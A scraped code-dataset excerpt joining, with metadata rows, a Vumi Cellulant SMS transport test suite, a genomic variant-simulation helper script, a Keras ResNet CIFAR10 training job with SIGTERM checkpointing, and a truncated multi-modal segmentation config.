        """Known-but-unused Cellulant parameters are silently accepted."""
        url = self.mkurl('hello', channelID='a', keyword='b', CHANNELID='c',
                         serviceID='d', SERVICEID='e', unsub='f')
        response = yield http_request(url, '', method='GET')
        [msg] = self.tx_helper.get_dispatched_inbound()
        self.assertEqual(msg['content'], "hello")
        self.assertEqual(json.loads(response),
                         {'message_id': msg['message_id']})
| 37.622024 | 78 | 0.592596 |
import json
from urllib import urlencode
from twisted.internet.defer import inlineCallbacks, DeferredQueue, returnValue
from vumi.utils import http_request, http_request_full
from vumi.tests.utils import MockHttpServer
from vumi.tests.helpers import VumiTestCase
from vumi.transports.cellulant import CellulantSmsTransport
from vumi.transports.tests.helpers import TransportHelper
class TestCellulantSmsTransport(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.cellulant_sms_calls = DeferredQueue()
self.mock_cellulant_sms = MockHttpServer(self.handle_request)
yield self.mock_cellulant_sms.start()
self.add_cleanup(self.mock_cellulant_sms.stop)
self.config = {
'web_path': "foo",
'web_port': 0,
'credentials': {
'2371234567': {
'username': 'user',
'password': 'pass',
},
'9292': {
'username': 'other-user',
'password': 'other-pass',
}
},
'outbound_url': self.mock_cellulant_sms.url,
}
self.tx_helper = self.add_helper(
TransportHelper(CellulantSmsTransport))
self.transport = yield self.tx_helper.get_transport(self.config)
self.transport_url = self.transport.get_transport_url()
def handle_request(self, request):
self.cellulant_sms_calls.put(request)
return ''
def mkurl(self, content, from_addr="2371234567", **kw):
params = {
'SOURCEADDR': from_addr,
'DESTADDR': '12345',
'MESSAGE': content,
'ID': '1234567',
}
params.update(kw)
return self.mkurl_raw(**params)
def mkurl_raw(self, **params):
return '%s%s?%s' % (
self.transport_url,
self.config['web_path'],
urlencode(params)
)
@inlineCallbacks
def test_health(self):
result = yield http_request(
self.transport_url + "health", "", method='GET')
self.assertEqual(json.loads(result), {'pending_requests': 0})
@inlineCallbacks
def test_inbound(self):
url = self.mkurl('hello')
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['to_addr'], "12345")
self.assertEqual(msg['from_addr'], "2371234567")
self.assertEqual(msg['content'], "hello")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
@inlineCallbacks
def test_outbound(self):
yield self.tx_helper.make_dispatch_outbound(
"hello world", to_addr="2371234567")
req = yield self.cellulant_sms_calls.get()
self.assertEqual(req.path, '/')
self.assertEqual(req.method, 'GET')
self.assertEqual({
'username': ['other-user'],
'password': ['other-pass'],
'source': ['9292'],
'destination': ['2371234567'],
'message': ['hello world'],
}, req.args)
@inlineCallbacks
def test_outbound_creds_selection(self):
yield self.tx_helper.make_dispatch_outbound(
"hello world", to_addr="2371234567", from_addr='2371234567')
req = yield self.cellulant_sms_calls.get()
self.assertEqual(req.path, '/')
self.assertEqual(req.method, 'GET')
self.assertEqual({
'username': ['user'],
'password': ['pass'],
'source': ['2371234567'],
'destination': ['2371234567'],
'message': ['hello world'],
}, req.args)
yield self.tx_helper.make_dispatch_outbound(
"hello world", to_addr="2371234567", from_addr='9292')
req = yield self.cellulant_sms_calls.get()
self.assertEqual(req.path, '/')
self.assertEqual(req.method, 'GET')
self.assertEqual({
'username': ['other-user'],
'password': ['other-pass'],
'source': ['9292'],
'destination': ['2371234567'],
'message': ['hello world'],
}, req.args)
@inlineCallbacks
def test_handle_non_ascii_input(self):
url = self.mkurl(u"öæł".encode("utf-8"))
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['to_addr'], "12345")
self.assertEqual(msg['from_addr'], "2371234567")
self.assertEqual(msg['content'], u"öæł")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
@inlineCallbacks
def test_bad_parameter(self):
url = self.mkurl('hello', foo='bar')
response = yield http_request_full(url, '', method='GET')
self.assertEqual(400, response.code)
self.assertEqual(json.loads(response.delivered_body),
{'unexpected_parameter': ['foo']})
@inlineCallbacks
def test_missing_parameters(self):
url = self.mkurl_raw(ID='12345678', DESTADDR='12345', MESSAGE='hello')
response = yield http_request_full(url, '', method='GET')
self.assertEqual(400, response.code)
self.assertEqual(json.loads(response.delivered_body),
{'missing_parameter': ['SOURCEADDR']})
@inlineCallbacks
def test_ignored_parameters(self):
url = self.mkurl('hello', channelID='a', keyword='b', CHANNELID='c',
serviceID='d', SERVICEID='e', unsub='f')
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['content'], "hello")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
class TestAcksCellulantSmsTransport(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.cellulant_sms_calls = DeferredQueue()
self.mock_cellulant_sms = MockHttpServer(self.handle_request)
self._mock_response = ''
yield self.mock_cellulant_sms.start()
self.add_cleanup(self.mock_cellulant_sms.stop)
self.config = {
'web_path': "foo",
'web_port': 0,
'credentials': {
'2371234567': {
'username': 'user',
'password': 'pass',
},
'9292': {
'username': 'other-user',
'password': 'other-pass',
}
},
'outbound_url': self.mock_cellulant_sms.url,
'validation_mode': 'permissive',
}
self.tx_helper = self.add_helper(
TransportHelper(CellulantSmsTransport))
self.transport = yield self.tx_helper.get_transport(self.config)
self.transport_url = self.transport.get_transport_url()
def mock_response(self, response):
self._mock_response = response
def handle_request(self, request):
self.cellulant_sms_calls.put(request)
return self._mock_response
@inlineCallbacks
def mock_event(self, msg, nr_events):
self.mock_response(msg)
yield self.tx_helper.make_dispatch_outbound(
"foo", to_addr='2371234567', message_id='id_%s' % (msg,))
yield self.cellulant_sms_calls.get()
events = yield self.tx_helper.wait_for_dispatched_events(nr_events)
returnValue(events)
@inlineCallbacks
def test_nack_param_error_E0(self):
[nack] = yield self.mock_event('E0', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_E0')
self.assertEqual(nack['nack_reason'],
self.transport.KNOWN_ERROR_RESPONSE_CODES['E0'])
@inlineCallbacks
def test_nack_login_error_E1(self):
[nack] = yield self.mock_event('E1', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_E1')
self.assertEqual(nack['nack_reason'],
self.transport.KNOWN_ERROR_RESPONSE_CODES['E1'])
@inlineCallbacks
def test_nack_credits_error_E2(self):
[nack] = yield self.mock_event('E2', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_E2')
self.assertEqual(nack['nack_reason'],
self.transport.KNOWN_ERROR_RESPONSE_CODES['E2'])
@inlineCallbacks
def test_nack_delivery_failed_1005(self):
[nack] = yield self.mock_event('1005', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_1005')
self.assertEqual(nack['nack_reason'],
self.transport.KNOWN_ERROR_RESPONSE_CODES['1005'])
@inlineCallbacks
def test_unknown_response(self):
[nack] = yield self.mock_event('something_unexpected', 1)
self.assertEqual(nack['event_type'], 'nack')
self.assertEqual(nack['user_message_id'], 'id_something_unexpected')
self.assertEqual(nack['nack_reason'],
'Unknown response code: something_unexpected')
@inlineCallbacks
def test_ack_success(self):
[event] = yield self.mock_event('1', 1)
self.assertEqual(event['event_type'], 'ack')
self.assertEqual(event['user_message_id'], 'id_1')
class TestPermissiveCellulantSmsTransport(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.cellulant_sms_calls = DeferredQueue()
self.mock_cellulant_sms = MockHttpServer(self.handle_request)
yield self.mock_cellulant_sms.start()
self.add_cleanup(self.mock_cellulant_sms.stop)
self.config = {
'web_path': "foo",
'web_port': 0,
'credentials': {
'2371234567': {
'username': 'user',
'password': 'pass',
},
'9292': {
'username': 'other-user',
'password': 'other-pass',
}
},
'outbound_url': self.mock_cellulant_sms.url,
'validation_mode': 'permissive',
}
self.tx_helper = self.add_helper(
TransportHelper(CellulantSmsTransport))
self.transport = yield self.tx_helper.get_transport(self.config)
self.transport_url = self.transport.get_transport_url()
def handle_request(self, request):
self.cellulant_sms_calls.put(request)
return ''
def mkurl(self, content, from_addr="2371234567", **kw):
params = {
'SOURCEADDR': from_addr,
'DESTADDR': '12345',
'MESSAGE': content,
'ID': '1234567',
}
params.update(kw)
return self.mkurl_raw(**params)
def mkurl_raw(self, **params):
return '%s%s?%s' % (
self.transport_url,
self.config['web_path'],
urlencode(params)
)
@inlineCallbacks
def test_bad_parameter_in_permissive_mode(self):
url = self.mkurl('hello', foo='bar')
response = yield http_request_full(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(200, response.code)
self.assertEqual(json.loads(response.delivered_body),
{'message_id': msg['message_id']})
@inlineCallbacks
def test_missing_parameters(self):
url = self.mkurl_raw(ID='12345678', DESTADDR='12345', MESSAGE='hello')
response = yield http_request_full(url, '', method='GET')
self.assertEqual(400, response.code)
self.assertEqual(json.loads(response.delivered_body),
{'missing_parameter': ['SOURCEADDR']})
@inlineCallbacks
def test_ignored_parameters(self):
url = self.mkurl('hello', channelID='a', keyword='b', CHANNELID='c',
serviceID='d', SERVICEID='e', unsub='f')
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['content'], "hello")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
| true | true |
1c3330f58e7b519be076c0bf3286fea33c99ab94 | 2,907 | py | Python | scripts/helperSimulations.py | alok123t/HyINDEL | 39cb5a32f08c9c3054f9b7237cb39baab7172d82 | [
"MIT"
] | 4 | 2020-07-11T09:49:09.000Z | 2021-10-14T18:54:53.000Z | scripts/helperSimulations.py | alok123t/HyINDEL | 39cb5a32f08c9c3054f9b7237cb39baab7172d82 | [
"MIT"
] | 1 | 2021-10-10T14:21:06.000Z | 2021-11-06T13:01:18.000Z | scripts/helperSimulations.py | alok123t/HyINDEL | 39cb5a32f08c9c3054f9b7237cb39baab7172d82 | [
"MIT"
] | null | null | null | import random
import sys
# Small, large size ranges
DISTR = [[50, 500], [500, 10000]]
# Number of variants for each size range
N_DISTR = 375
def getRandomString(l):
    """Return a random DNA sequence of length *l* over the A/T/G/C alphabet."""
    bases = 'ATGC'
    picked = []
    for _ in range(l):
        # One random.choice call per base keeps the RNG call sequence
        # identical to the original generator-expression form.
        picked.append(random.choice(bases))
    return ''.join(picked)
def genPositions():
    """Print N_DISTR insertion and N_DISTR deletion records per size range.

    Insertions are emitted as 'INC <sequence>' (a random sequence of the
    sampled length); deletions as 'DEL <size>'.
    """
    for lo, hi in DISTR:
        # Insertions: sample distinct lengths, print a sequence for each.
        for length in random.sample(range(lo, hi), N_DISTR):
            print('INC ' + getRandomString(length))
        # Deletions: sample distinct sizes, print only the size.
        for size in random.sample(range(lo, hi), N_DISTR):
            print('DEL ' + str(size))
def genVariants(folderPath):
    """Read SVs from <folderPath>tmp.bedpe and write variant lists.

    Deletions and insertions are bucketed as small (< 500 bp) or large
    and emitted as 'DELL'/'INCL' records into <folderPath>1.txt and
    <folderPath>2.txt (folderPath is assumed to end with a separator --
    TODO confirm against callers).
    """
    dels_large = []
    dels_small = []
    ins_large = []
    ins_small = []
    # Read input bedpe file
    with open(folderPath + 'tmp.bedpe', 'r') as f:
        for line in f:
            l = line.split('\t')
            if 'DEL' in l[6]:
                chr = l[0]
                st = int(l[2])
                en = int(l[4])
                # Bucket by deletion span: small < 500 bp, else large.
                if en - st + 1 < 500:
                    dels_small.append([chr, st, en])
                else:
                    dels_large.append([chr, st, en])
            elif 'LITERAL' in l[0]:
                # NOTE(review): column layout (l[1]=size, l[3]=chrom,
                # l[4]=position) is inferred from usage here -- confirm
                # against the tool that produced tmp.bedpe.
                chr = l[3]
                pos = int(l[4])
                sz = int(l[1])
                # Insertions get a freshly generated random sequence.
                seq = getRandomString(sz)
                if sz < 500:
                    ins_small.append([chr, pos, seq])
                else:
                    ins_large.append([chr, pos, seq])
    # Write variants
    # NOTE(review): in each loop below both writes sit inside the
    # 'i < len(...)/2' guard, so only the first half of every bucket is
    # written (to both files) and the second half is dropped -- confirm
    # whether f2.write() was meant to be unconditional (e.g. het/hom split).
    with open(folderPath + '1.txt', 'w') as f1, open(folderPath + '2.txt', 'w') as f2:
        # Dels large
        for i in range(len(dels_large)):
            x = dels_large[i]
            out = 'DELL ' + x[0] + ' ' + str(x[1]) + ' ' + str(x[2]) + '\n'
            if i < len(dels_large) / 2:
                f1.write(out)
                f2.write(out)
        # Dels small
        for i in range(len(dels_small)):
            x = dels_small[i]
            out = 'DELL ' + x[0] + ' ' + str(x[1]) + ' ' + str(x[2]) + '\n'
            if i < len(dels_small) / 2:
                f1.write(out)
                f2.write(out)
        # Ins large
        for i in range(len(ins_large)):
            x = ins_large[i]
            out = 'INCL ' + x[0] + ' ' + \
                str(x[1]) + ' ' + str(x[1]) + ' ' + x[2] + '\n'
            if i < len(ins_large) / 2:
                f1.write(out)
                f2.write(out)
        # Ins small
        for i in range(len(ins_small)):
            x = ins_small[i]
            out = 'INCL ' + x[0] + ' ' + \
                str(x[1]) + ' ' + str(x[1]) + ' ' + x[2] + '\n'
            if i < len(ins_small) / 2:
                f1.write(out)
                f2.write(out)
def main():
    """Dispatch to a subcommand named by the first CLI argument."""
    command = sys.argv[1]
    if command == 'genPositions':
        genPositions()
    elif command == 'genVariants':
        # genVariants takes the output folder path as its argument.
        genVariants(sys.argv[2])
main()
| 28.782178 | 86 | 0.43894 | import random
import sys
DISTR = [[50, 500], [500, 10000]]
N_DISTR = 375
def getRandomString(l):
return ''.join(random.choice('ATGC') for _ in range(l))
def genPositions():
for d in DISTR:
rndVals = random.sample(range(d[0], d[1]), N_DISTR)
for val in rndVals:
out = 'INC ' + getRandomString(val)
print(out)
rndVals = random.sample(range(d[0], d[1]), N_DISTR)
for val in rndVals:
out = 'DEL ' + str(val)
print(out)
def genVariants(folderPath):
dels_large = []
dels_small = []
ins_large = []
ins_small = []
with open(folderPath + 'tmp.bedpe', 'r') as f:
for line in f:
l = line.split('\t')
if 'DEL' in l[6]:
chr = l[0]
st = int(l[2])
en = int(l[4])
if en - st + 1 < 500:
dels_small.append([chr, st, en])
else:
dels_large.append([chr, st, en])
elif 'LITERAL' in l[0]:
chr = l[3]
pos = int(l[4])
sz = int(l[1])
seq = getRandomString(sz)
if sz < 500:
ins_small.append([chr, pos, seq])
else:
ins_large.append([chr, pos, seq])
with open(folderPath + '1.txt', 'w') as f1, open(folderPath + '2.txt', 'w') as f2:
for i in range(len(dels_large)):
x = dels_large[i]
out = 'DELL ' + x[0] + ' ' + str(x[1]) + ' ' + str(x[2]) + '\n'
if i < len(dels_large) / 2:
f1.write(out)
f2.write(out)
for i in range(len(dels_small)):
x = dels_small[i]
out = 'DELL ' + x[0] + ' ' + str(x[1]) + ' ' + str(x[2]) + '\n'
if i < len(dels_small) / 2:
f1.write(out)
f2.write(out)
for i in range(len(ins_large)):
x = ins_large[i]
out = 'INCL ' + x[0] + ' ' + \
str(x[1]) + ' ' + str(x[1]) + ' ' + x[2] + '\n'
if i < len(ins_large) / 2:
f1.write(out)
f2.write(out)
for i in range(len(ins_small)):
x = ins_small[i]
out = 'INCL ' + x[0] + ' ' + \
str(x[1]) + ' ' + str(x[1]) + ' ' + x[2] + '\n'
if i < len(ins_small) / 2:
f1.write(out)
f2.write(out)
def main():
if sys.argv[1] == 'genPositions':
genPositions()
elif sys.argv[1] == 'genVariants':
genVariants(sys.argv[2])
if __name__ == '__main__':
main()
| true | true |
1c3331f13df114ad08467370a9d4d07f01f65559 | 7,816 | py | Python | examples/pwr_run/checkpointing/final/no_threshold/job53.py | boringlee24/keras_old | 1e1176c45c4952ba1b9b9e58e9cc4df027ab111d | [
"MIT"
] | null | null | null | examples/pwr_run/checkpointing/final/no_threshold/job53.py | boringlee24/keras_old | 1e1176c45c4952ba1b9b9e58e9cc4df027ab111d | [
"MIT"
] | null | null | null | examples/pwr_run/checkpointing/final/no_threshold/job53.py | boringlee24/keras_old | 1e1176c45c4952ba1b9b9e58e9cc4df027ab111d | [
"MIT"
] | null | null | null | """
#Trains a ResNet on the CIFAR10 dataset.
"""
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.resnet import ResNet50, ResNet101, ResNet152
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
# Training parameters
batch_size = 256
args_lr = 0.001
args_model = 'resnet50'
epoch_begin_time = 0
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_no_threshold/' + job_name + '*'
total_epochs = 4
starting_epoch = 0
# first step is to update the PID
pid = os.getpid()
message = job_name + ' pid ' + str(pid) # 'job50 pid 3333'
send_signal.send(args.node, 10002, message)
if args.resume:
save_file = glob.glob(save_files)[0]
# epochs = int(save_file.split('/')[4].split('_')[1].split('.')[0])
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
# Subtracting pixel mean improves accuracy
subtract_pixel_mean = True
n = 3
# Model name, depth and version
model_type = args.tc #'P100_resnet50_he_256_1'
# Load the CIFAR10 data.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# If subtract pixel mean is enabled
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
message = job_name + ' b_end'
send_signal.send(args.node, 10002, message)
model = keras.models.load_model(save_file)
message = job_name + ' c_end'
send_signal.send(args.node, 10002, message)
else:
print('train from start')
model = models.Sequential()
if '50' in args_model:
base_model = ResNet50(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
elif '101' in args_model:
base_model = ResNet101(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
elif '152' in args_model:
base_model = ResNet152(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
#base_model.summary()
#pdb.set_trace()
#model.add(layers.UpSampling2D((2,2)))
#model.add(layers.UpSampling2D((2,2)))
#model.add(layers.UpSampling2D((2,2)))
model.add(base_model)
model.add(layers.Flatten())
#model.add(layers.BatchNormalization())
#model.add(layers.Dense(128, activation='relu'))
#model.add(layers.Dropout(0.5))
#model.add(layers.BatchNormalization())
#model.add(layers.Dense(64, activation='relu'))
#model.add(layers.Dropout(0.5))
#model.add(layers.BatchNormalization())
model.add(layers.Dense(10, activation='softmax'))#, kernel_initializer='he_uniform'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
#model.summary()
print(model_type)
#pdb.set_trace()
current_epoch = 0
################### connects interrupt signal to the process #####################
def terminateProcess(signalNumber, frame):
    """SIGTERM handler: report wasted epoch time, checkpoint, and exit.

    Sends bookkeeping messages ('<job> waste N', '<job> checkpoint') to
    the scheduler node on port 10002, replaces any existing checkpoint
    with one tagged by the current epoch, then exits the process.
    """
    # first record the wasted epoch time
    global epoch_begin_time
    if epoch_begin_time == 0:
        # No epoch has started yet, so no partial-epoch work was lost.
        epoch_waste_time = 0
    else:
        epoch_waste_time = int(time.time() - epoch_begin_time)
    message = job_name + ' waste ' + str(epoch_waste_time) # 'job50 waste 100'
    if epoch_waste_time > 0:
        send_signal.send(args.node, 10002, message)
    print('checkpointing the model triggered by kill -15 signal')
    # delete whatever checkpoint that already exists
    for f in glob.glob(save_files):
        os.remove(f)
    # Save with the epoch index in the filename so the resume path can
    # parse starting_epoch back out of it.
    model.save('/scratch/li.baol/checkpoint_no_threshold/' + job_name + '_' + str(current_epoch) + '.h5')
    print ('(SIGTERM) terminating the process')
    message = job_name + ' checkpoint'
    send_signal.send(args.node, 10002, message)
    sys.exit()
signal.signal(signal.SIGTERM, terminateProcess)
#################################################################################
logdir = '/scratch/li.baol/tsrbrd_log/job_runs/' + model_type + '/' + job_name
tensorboard_callback = TensorBoard(log_dir=logdir)#, update_freq='batch')
first_epoch_start = 0
class PrintEpoch(keras.callbacks.Callback):
    """Keras callback that reports epoch progress to the scheduler node.

    Tracks the current epoch and its start time in module globals so the
    SIGTERM handler can checkpoint and report wasted time accurately.
    """
    def on_epoch_begin(self, epoch, logs=None):
        """Record the epoch start time and emit start-of-epoch signals."""
        global current_epoch, first_epoch_start
        #remaining_epochs = epochs - epoch
        current_epoch = epoch
        print('current epoch ' + str(current_epoch))
        global epoch_begin_time
        epoch_begin_time = time.time()
        if epoch == starting_epoch and args.resume:
            first_epoch_start = time.time()
            # 'd_end' marks the end of the resume/restore phase.
            message = job_name + ' d_end'
            send_signal.send(args.node, 10002, message)
        elif epoch == starting_epoch:
            first_epoch_start = time.time()
        if epoch == starting_epoch:
            # send signal to indicate checkpoint is qualified
            message = job_name + ' ckpt_qual'
            send_signal.send(args.node, 10002, message)
    def on_epoch_end(self, epoch, logs=None):
        """Report first-epoch duration and overall completion fraction."""
        if epoch == starting_epoch:
            first_epoch_time = int(time.time() - first_epoch_start)
            message = job_name + ' 1st_epoch ' + str(first_epoch_time)
            send_signal.send(args.node, 10002, message)
        # fit() runs round(total_epochs/2) epochs, so progress is the
        # fraction of that target completed.
        progress = round((epoch+1) / round(total_epochs/2), 2)
        message = job_name + ' completion ' + str(progress)
        send_signal.send(args.node, 10002, message)
my_callback = PrintEpoch()
callbacks = [tensorboard_callback, my_callback]
#[checkpoint, lr_reducer, lr_scheduler, tensorboard_callback]
# Run training
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=round(total_epochs/2),
validation_data=(x_test, y_test),
shuffle=True,
callbacks=callbacks,
initial_epoch=starting_epoch,
verbose=1
)
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
# send signal to indicate job has finished
message = job_name + ' finish'
send_signal.send(args.node, 10002, message)
| 32.978903 | 118 | 0.69153 |
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.resnet import ResNet50, ResNet101, ResNet152
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
# Command-line interface: testcase name, resume flag, GPU selection and the
# scheduler host to which status signals are sent.
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
# Pin this process to the requested GPU before TF initialises CUDA.
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
batch_size = 256
args_lr = 0.001
args_model = 'resnet50'
epoch_begin_time = 0
# The job name is the script's own filename without extension; it keys the
# checkpoint glob below and every message sent to the scheduler.
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_no_threshold/' + job_name + '*'
total_epochs = 4
starting_epoch = 0
# Report our PID to the scheduler on port 10002.
pid = os.getpid()
message = job_name + ' pid ' + str(pid)
send_signal.send(args.node, 10002, message)
if args.resume:
    # Recover the epoch to resume from out of the checkpoint filename.
    # NOTE(review): split('/')[4] hard-codes the path depth of the scratch
    # directory; breaks if the checkpoint root moves -- TODO confirm.
    save_file = glob.glob(save_files)[0]
    starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
subtract_pixel_mean = True
n = 3
model_type = args.tc
# Load CIFAR-10 and scale pixel values into [0, 1].
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# Center both splits on the training-set per-pixel mean.
if subtract_pixel_mean:
    x_train_mean = np.mean(x_train, axis=0)
    x_train -= x_train_mean
    x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
# One-hot encode the integer labels.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
    # Resuming: notify the scheduler around the (potentially slow) model load.
    print('resume from checkpoint')
    message = job_name + ' b_end'
    send_signal.send(args.node, 10002, message)
    model = keras.models.load_model(save_file)
    message = job_name + ' c_end'
    send_signal.send(args.node, 10002, message)
else:
    # Fresh start: build an untrained ResNet backbone + softmax head.
    print('train from start')
    model = models.Sequential()
    if '50' in args_model:
        base_model = ResNet50(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
    elif '101' in args_model:
        base_model = ResNet101(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
    elif '152' in args_model:
        base_model = ResNet152(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
    model.add(base_model)
    model.add(layers.Flatten())
    model.add(layers.Dense(10, activation='softmax'))
    # NOTE(review): Adam's `lr` argument is the legacy spelling of
    # `learning_rate` in newer Keras releases.
    model.compile(loss='categorical_crossentropy',
                  optimizer=Adam(lr=args_lr),
                  metrics=['accuracy'])
print(model_type)
current_epoch = 0
| true | true |
1c33327019a9318a80800e8752a3c80c71bc8dcd | 7,953 | py | Python | configs/fusion_consis/xmuda/src_ctr_usa_v1_w2.py | XYHC-MMDA/Multi-modal-Multi-task-DA | ed8297eb489d50c580795713cccb72bc958f406f | [
"Apache-2.0"
] | 1 | 2020-11-05T19:51:23.000Z | 2020-11-05T19:51:23.000Z | configs/fusion_consis/xmuda/src_ctr_usa_v1_w2.py | XYHC-MMDA/Multi-modal-Multi-task-DA | ed8297eb489d50c580795713cccb72bc958f406f | [
"Apache-2.0"
] | null | null | null | configs/fusion_consis/xmuda/src_ctr_usa_v1_w2.py | XYHC-MMDA/Multi-modal-Multi-task-DA | ed8297eb489d50c580795713cccb72bc958f406f | [
"Apache-2.0"
] | null | null | null | # the same as src_ctr_usa_v1.py except for max_pts = 512
##############################################
# variants: Runner, model
# options: class_weights
##############################################
# runner
# runner = 'XmudaRunner' # for any customized runner, use general_train.py
only_contrast = False # default False
# model; if no contrast, just set contrast_criterion to None; assert contrast_criterion is not None or not only_contrast
model_type = 'SegFusionV3'
contrast_criterion = dict(type='NT_Xent', temperature=0.1, normalize=True, contrast_mode='cross_entropy')
# Per the file header, this config only differs from src_ctr_usa_v1.py by
# max_pts = 512 (cap on points sampled for the contrastive loss).
max_pts = 512
lambda_contrast = 0.1
img_feat_channels = 64
pts_feat_dim = 16
# Pre-logits features are the concatenation of image and point features
# (64 + 16 = 80 channels).
prelogits_dim = img_feat_channels + pts_feat_dim
# XmudaAug3D, UNetSCn
scn_scale = 20
scn_full_scale = 4096
# class_weights
# Per-class cross-entropy weights for the two domain splits; only the
# USA->Singapore weights are active below.
daynight_weights = [2.68678412, 4.36182969, 5.47896839, 3.89026883, 1.]
usasng_weights = [2.47956584, 4.26788384, 5.71114131, 3.80241668, 1.]
class_weights = usasng_weights
# lr_scheduler
lr_step = [16, 22]
total_epochs = 24
#######################################################
# model
#######################################################
model = dict(
    type=model_type,
    img_backbone=dict(
        type='UNetResNet34',
        out_channels=img_feat_channels,
        pretrained=True),
    pts_backbone=dict(
        type='UNetSCN',
        in_channels=1,
        full_scale=scn_full_scale),
    num_classes=5,
    prelogits_dim=prelogits_dim,
    class_weights=class_weights,
    contrast_criterion=contrast_criterion,
    max_pts=max_pts,
    lambda_contrast=lambda_contrast
)
train_cfg = None
test_cfg = None
# 4 merged foreground classes; the 5th model output is the implicit
# background class (see num_classes=5 above).
class_names = [
    'vehicle',  # car, truck, bus, trailer, cv
    'pedestrian',  # pedestrian
    'bike',  # motorcycle, bicycle
    'traffic_boundary'  # traffic_cone, barrier
    # background
]
data_root = '/home/xyyue/xiangyu/nuscenes_unzip/'
input_modality = dict(
    use_lidar=True,
    use_camera=True,
    use_radar=False,
    use_map=False,
    use_external=False)
